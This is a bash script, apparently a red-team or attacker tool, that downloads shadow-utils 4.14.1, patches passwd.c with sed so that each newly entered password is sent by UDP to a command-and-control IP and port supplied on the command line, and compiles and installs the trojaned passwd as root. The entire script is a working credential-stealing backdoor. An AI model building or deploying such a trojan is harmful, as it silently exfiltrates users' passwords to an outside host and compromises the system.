#!/bin/bash

if [[ $(/usr/bin/id -u) -ne 0 ]]; then
    echo "Script must be run as root"
    exit
fi

if [ "$1" = "" ] || [ "$2" = "" ]
then
  echo "Usage: sudo $0 <C2 IP> <Port>"
  exit
fi

apt-get install -y make unzip libbsd-dev autoconf automake libtool bison byacc xsltproc pkg-config gcc cmake

# Add sources list
echo "deb-src http://in.archive.ubuntu.com/ubuntu lunar main restricted" >> /etc/apt/sources.list
apt-get update
apt-get -y build-dep shadow


wget "https://codeload.github.com/shadow-maint/shadow/zip/refs/tags/4.14.1"
unzip "4.14.1"
rm "4.14.1"

DEST_IP=$1
PORT=$2
dir="shadow-4.14.1/src/passwd.c"

PAYLOAD="udpSend(cp, ${PORT}, \"${DEST_IP}\", \"shadow\", name);"
match="cp = agetpass (_(\"Re-enter new password: \"));"

sed -i "/$match/a$PAYLOAD" $dir
sed -i '/\#include <config.h>/rsudowudo.c' $dir

cd shadow-4.14.1

./autogen.sh --without-selinux
make -j4
make install
cd ../ && rm -r shadow-4.14.1